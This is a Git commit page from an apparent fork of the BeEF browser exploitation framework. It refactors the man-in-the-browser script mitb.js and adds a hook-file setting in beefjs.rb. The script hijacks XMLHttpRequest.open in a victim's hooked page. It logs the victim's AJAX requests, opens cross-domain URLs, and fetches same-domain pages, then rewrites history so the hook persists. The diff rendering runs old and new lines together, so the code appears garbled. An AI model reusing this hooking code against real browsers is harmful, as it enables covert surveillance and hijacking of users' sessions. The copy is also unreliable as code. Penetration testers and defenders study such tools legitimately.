Hiddenden/beef
2
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Refactored mitm.js AJAX sniffing feature. Fixed a couple of other bugs in mitb.js

Browse Source
This commit is contained in:
antisnatchor
2012-12-30 13:13:10 +01:00
parent 0244980db0
commit d976e86cbe
2 changed files with 25 additions and 45 deletions
Download Patch File Download Diff File Expand all files Collapse all files

67
core/main/client/mitb.js
View File

@@ -15,46 +15,30 @@ beef.mitb = {
beef.mitb.curl = curl; beef.mitb.curl = curl;
/*Override open method to intercept ajax request*/ /*Override open method to intercept ajax request*/
var xml_type; var xml_type;
var hook_file = "<%= @hook_file %>";
if (window.XMLHttpRequest && !(window.ActiveXObject)) { if (window.XMLHttpRequest && !(window.ActiveXObject)) {
xml_type = 'XMLHttpRequest';
}
if (xml_type == "XMLHttpRequest") {
beef.mitb.sniff("Method XMLHttpRequest.open override"); beef.mitb.sniff("Method XMLHttpRequest.open override");
(function (open) { (function (open) {
XMLHttpRequest.prototype.open = function (method, url, async, user, pass) { XMLHttpRequest.prototype.open = function (method, url, async, mitb_call) {
// Ignore it and don't hijack it. It's either a request to BeEF (hook file or Dynamic Handler)
var portRegex = new RegExp(":[0-9]+"); // or a request initiated by the MiTB itself.
var portR = portRegex.exec(url); if (mitb_call || (url.indexOf(hook_file) != -1 || url.indexOf("/dh?") != -1)) {
/*return :port*/ open.call(this, method, url, async, true);
var requestPort; }else {
var portRegex = new RegExp(":[0-9]+");
if (portR != null) { var portR = portRegex.exec(url);
requestPort = portR[0].split(":"); var requestPort;
} if (portR != null) { requestPort = portR[0].split(":")[1]; }
if ((user == "beef") && (pass == "beef")) {
/*a poisoned something*/
open.call(this, method, url, async, null, null);
}
else if (url.indexOf("hook.js") != -1 || url.indexOf("/dh?") != -1) {
/*a beef hook.js polling or dh */
open.call(this, method, url, async, null, null);
}
else {
//GET request
if (method == "GET") { if (method == "GET") {
//GET request -> cross-domain
if (url.indexOf(document.location.hostname) == -1 || (portR != null && requestPort != document.location.port )) { if (url.indexOf(document.location.hostname) == -1 || (portR != null && requestPort != document.location.port )) {
beef.mitb.sniff("GET [Ajax CrossDomain Request]: " + url); beef.mitb.sniff("GET [Ajax CrossDomain Request]: " + url);
window.open(url); window.open(url);
}else { //GET request -> same-domain
}
else {
beef.mitb.sniff("GET [Ajax Request]: " + url); beef.mitb.sniff("GET [Ajax Request]: " + url);
if (beef.mitb.fetch(url, document.getElementsByTagName("html")[0])) { if (beef.mitb.fetch(url, document.getElementsByTagName("html")[0])) {
var title = ""; var title = "";
@@ -63,26 +47,19 @@ beef.mitb = {
} else { } else {
title = document.getElementsByTagName("title")[0].innerHTML; title = document.getElementsByTagName("title")[0].innerHTML;
} }
/*write the url of the page*/ // write the url of the page
history.pushState({ Be:"EF" }, title, url); history.pushState({ Be:"EF" }, title, url);
} }
} }
}else{
} //POST request
else { beef.mitb.sniff("POST ajax request to: " + url);
/*if we are here we have an ajax post req*/ open.call(this, method, url, async, true);
beef.mitb.sniff("Post ajax request to: " + url);
open.call(this, method, url, async, user, pass);
} }
} }
}; };
})(XMLHttpRequest.prototype.open); })(XMLHttpRequest.prototype.open);
} }
}, },
// Initializes the hook on anchors and forms. // Initializes the hook on anchors and forms.
@@ -161,7 +138,7 @@ beef.mitb = {
fetchForm:function (url, query, target) { fetchForm:function (url, query, target) {
try { try {
var y = new XMLHttpRequest(); var y = new XMLHttpRequest();
y.open('POST', url, false, "beef", "beef"); y.open('POST', url, false, true);
y.setRequestHeader("Content-type", "application/x-www-form-urlencoded"); y.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
y.onreadystatechange = function () { y.onreadystatechange = function () {
if (y.readyState == 4 && y.responseText != "") { if (y.readyState == 4 && y.responseText != "") {
@@ -181,7 +158,7 @@ beef.mitb = {
fetch:function (url, target) { fetch:function (url, target) {
try { try {
var y = new XMLHttpRequest(); var y = new XMLHttpRequest();
y.open('GET', url, false, "beef", "beef"); y.open('GET', url, false, true);
y.onreadystatechange = function () { y.onreadystatechange = function () {
if (y.readyState == 4 && y.responseText != "") { if (y.readyState == 4 && y.responseText != "") {
@@ -204,7 +181,7 @@ beef.mitb = {
try { try {
var target = document.getElementsByTagName("html")[0]; var target = document.getElementsByTagName("html")[0];
var y = new XMLHttpRequest(); var y = new XMLHttpRequest();
y.open('GET', url, false, "beef", "beef"); y.open('GET', url, false, true);
y.onreadystatechange = function () { y.onreadystatechange = function () {
if (y.readyState == 4 && y.responseText != "") { if (y.readyState == 4 && y.responseText != "") {
var title = ""; var title = "";

3
core/main/handlers/modules/beefjs.rb
View File

@@ -74,6 +74,9 @@ module BeEF
# @note set the XHR-polling timeout # @note set the XHR-polling timeout
hook_session_config['xhr_poll_timeout'] = config.get("beef.http.xhr_poll_timeout") hook_session_config['xhr_poll_timeout'] = config.get("beef.http.xhr_poll_timeout")
# @note set the hook file path
hook_session_config['hook_file'] = config.get("beef.http.hook_file")
# @note if http_port <> public_port in config ini, use the public_port # @note if http_port <> public_port in config ini, use the public_port
unless hook_session_config['beef_public_port'].nil? unless hook_session_config['beef_public_port'].nil?
if hook_session_config['beef_port'] != hook_session_config['beef_public_port'] if hook_session_config['beef_port'] != hook_session_config['beef_public_port']